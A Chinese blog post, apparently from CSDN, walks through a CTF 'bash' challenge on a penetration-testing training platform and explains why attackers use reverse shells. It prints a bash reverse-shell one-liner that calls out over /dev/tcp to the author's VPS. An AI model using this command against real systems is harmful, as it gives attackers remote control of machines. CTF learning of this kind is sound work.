安鸾渗透测试平台-CTF系列-bash

最新推荐文章于 2024-06-02 15:58:33 发布
最新推荐文章于 2024-06-02 15:58:33 发布
阅读量2.5k 收藏 1
点赞数
分类专栏: CTF -WEB 学习 文章标签: bash 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AAAAAAAAAAAA66/article/details/122793536
版权

工具Xshell 公网VPS接收反弹shell

Xshell新手的下载及安装教程(超详细)_新手程序员攀爬之路的博客-CSDN博客_xshell使用教程

 

Xshell连接后

#!/bin/bash

cat ${0}

while :
do
    echo "$"
    read input
    output=`$input`
显示了一个文件,不过咋做呢?这里可能考察的是linux的语法
方法 输入bash 获得shell 

cat ${0}

while :
do
    echo "$"
    read input
    output=`$input`
done
$
bash
ctf@93e6b425811b:/home/ctf$ ls
ctf@93e6b425811b:/home/ctf$ cat flag
cat: flag: No such file or directory
ctf@93e6b425811b:/home/ctf$ cat /flag
cat: /flag: No such file or directory

发现还是无正常数据回显,仅仅是保错,不过联想到题目名字Bash 也正好符合反弹shell的条件。(数据无法回显?)

为什么要反弹shell

通常用于被控端因防火墙受限、权限不足、端口被占用等情形

假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。那么什么情况下正向连接不太好用了呢?

1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。

2.它的ip会动态改变,你不能持续控制。

3.由于防火墙等限制,对方机器只能发送请求,不能接收请求。

4.对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。
 

#!/bin/bash

cat ${0}

while :
do
    echo "$"
    read input
    output=`$input`
done
$
bash
ctf@93e6b425811b:/home/ctf$ ls
ctf@93e6b425811b:/home/ctf$ cat flag
cat: flag: No such file or directory
ctf@93e6b425811b:/home/ctf$ cat /flag
cat: /flag: No such file or directory
ctf@93e6b425811b:/home/ctf$ 
ctf@93e6b425811b:/home/ctf$ bash -i >& /dev/tcp/121.xxxxxxx/3333 0>&1

 

 

算是尝试的误打误撞写了出来,不过关于第一个框中的代码,还有为什么数据不回显原因还是不太懂,如果有懂的老哥可以帮忙指正一下。(评论私聊都行)

 

AAAAAAAAAAAA66
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
安鸾渗透CTF训练之bash
LHBD_R的博客
11-07 1470
CTFCTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式 bash:Unix shell的一种,Bash是一个命令处理器,通常运行于文本窗口中,并能执行用户直接输入的命令。Bash还能从文件中读取命令,这样的文件称为脚本 Linux中>&或者>&的意思:将标准错误输出重定向到标准输出 >:指将指定的文件重定向 &:表示任务在后台执行 ...
安鸾渗透实战平台CTF训练题) bash (150分)
weixin_50985113的博客
02-08 313
安鸾渗透实战平台公网vpsxshell(也可以用windows自带的cmd)能连接就行。
布尔盲注(ctfhub)
2401_82985722的博客
03-27 759
页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL注入。在注入语句后,盲注不是返回查询到的结果,而只是返回查询是否成功。?id=1' and 1=1--+ 真页面true?id=1' and 1=2--+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数一、手动注入一般顺序:爆数据库名长度。
靶场测试--安鸾渗透实战平台
ID_xiaomage的博客
09-13 2076
CMS系列-Discuz 题目URL:http://whalwl.host:8042/forum.php(tips:flag在网站根目录下) 文章目录CMS系列-Discuz前言一、利用Burp进行抓取数据包二、将数据包发送到Repeater1.构造请求参数验证漏洞是否存在2.利用Cookie信息上传Shell3.可以使用AntSword、Chopper或者Behinder进行连接,这里使用的是AntSword总结 前言 漏洞描述 Discuz ML! V3.X存在代码注入漏洞,攻击者通过精心构建的请求
安鸾渗透实战平台——SSRF (600分)
weixin_50985113的博客
08-13 677
安鸾渗透实战平台——SSRF (600分)
CTFBash中的小技巧
Assassin
08-22 3295
1.绕过空格过滤bash中可以过滤的符号$IFS$9 ${IFS} %09 (符号需要php环境)2.命令分隔符这里介绍5种姿势1.%0a符号 换行符2.%0d符号 回车符3.;符号 在 shell 中,担任”连续指令”功能的符号就是”分号”4.&符号 & 放在启动参数后面表示设置此进程为后台进程,默认情况下,进程是前台进程,这时就把Shell给占据
Linux&bash闯关CTF
hl1293348082的专栏
04-12 441
关卡说明 每一关的目标是获取下一关的入口密码,有了这个密码才能进行下一关。 第一关 描述 下一关的密码保存在当前目录下的readme中。 命令 第二关 描述 下一关密码保存在系统中文件名中包含'-'的文件。 命令 第三关 描述 下一关密码保存在当前目录下的隐藏文件中 命令 第四关 描述 下一关密码保存在当前目录的一个text文件中 命令 第五关 描述 下一关的密码保存在符合几个条件的文件中,条件包含:文件大小为1033字节、不可执行、可读文件。 命令
安鸾渗透实战平台--综合渗透--企业网站渗透流程
jjpsb的博客
03-30 6352
本次实验的环境由安鸾渗透实战平台搭建 目标是渗透进网站拿到flag,但flag并未提示具体位置。 出于学习和记录目的,由于本人也是小白,错误的地方望指点 准备工作: 实验环境:安鸾学院-powered by S-CMS 渗透工具使用: Burpsuite Sqlmap 蚁剑(中国菜刀) Whatweb Dirsearch 实验目的: 获得webshell 寻找flag 渗透流程: 信息收集、寻找渗透点 初步使用浏览器正常浏览了一...
59-59.渗透测试-CTF题目案例.mp4
05-10
59-59.渗透测试-CTF题目案例.mp4
66-66.渗透测试-CTF题目分析.mp4
05-10
66-66.渗透测试-CTF题目分析.mp4
saigar-ctf:Saigar CTF 平台
05-29
赛加尔CTF世界上第一个众包调查的 CTF 平台介绍Saigar CTF 是一个开源 CTF 平台,用于促进众包调查,可以扩展到数百个具有实时数据的并发用户。 Saigar CTF 平台促成的最大事件有500 多个用户,在6 小时内提交了8,...
超微X11SPW-CTF主板用户手册
04-01
超微X11SPW-CTF主板用户手册
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
解决Mac ~/.bash_profile 配置的环境变量重启终端后失效问题
猿小白的博客
05-31 175
在Mac系统中,配置环境变量通常是在~/.bash_profile文件中进行。然而,有时会遇到配置的环境变量在重启终端后失效的问题。在~/.zshrc文件最后或最前面,增加一行。
mac 配置.bash_profile不生效问题
lly576403061的博客
05-28 500
mac 配置.bash_profile不生效原因分析和问题解决
漫谈企业信息化安全 - 零信任架构
SplashtopLoki的博客
05-27 1201
SDP是一种网络安全框架,旨在提供安全、隐私和访问控制,通过创建一种透明的、动态的连接模型,将用户和设备与应用程序之间的连接限制在一个隐形的、不可见的网络边界之内。SDP的目标是通过动态生成的边界实现更加精细的访问控制和安全性。
Docker 安全及日志管理
最新发布
2301_77081516的博客
06-02 276
虚拟机通过添加 Hypervisor 层,虚拟出网卡、内存、CPU 等虚拟硬件,再在其上建立虚拟机,每个虚拟机都有自己的系统内核。而 Docker 容器则是通过隔离的方式,将文件系统、 进程、设备、网络等资源进行隔离,再对权限、CPU 资源等进行控制,最终让容器之间互不影响,容器无法影响宿主机。容器与宿主机共享内核、文件系统、硬件等资源。
掌控安全CTF-2024年5月擂台赛-WP(部分)
ASD830的博客
05-27 1125
如果实在没看到的话(或者扫不出来),可以放stegsolve里面看看,red plane 3,够清晰了吧哈哈哈。
Ubuntu-CTF
07-28
CTFd是一个用于举办和参加CTF(Capture The Flag)安全竞赛的平台。根据引用\[1\]和引用\[2\]的内容,你可以按照以下步骤在Ubuntu上搭建CTFd平台: 1. 首先,确保你已经安装了虚拟机并配置好了Ubuntu系统。具体的安装和配置步骤可以参考相关的教程。 2. 配置阿里云镜像下载源文件。这可以加快软件包的下载速度。你可以按照引用\[1\]中的指导进行配置。 3. 进入CTFd目录。在终端中使用cd命令进入CTFd的目录。 4. 使用gunicorn工具配置CTFd。根据引用\[2\]和引用\[3\]的内容,你可以使用以下命令配置gunicorn工具: ``` gunicorn --bind 0.0.0.0:8000 -w 5 "CTFd:create_app()" ``` 5. 如果你希望在重启电脑后再次运行CTFd平台,确保以root权限运行。在Ubuntu终端中使用sudo命令运行上述命令。 这样,你就可以在Ubuntu上成功搭建CTFd平台了。请注意,这只是一个简单的搭建过程,具体的配置和使用方法可能会有所不同,你可以参考相关的文档和教程进行更详细的了解和操作。 #### 引用[.reference_title] - *1* *2* *3* [基于Ubuntu搭建CTFd平台(全网最全)](https://blog.csdn.net/qq_25953411/article/details/127489944)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值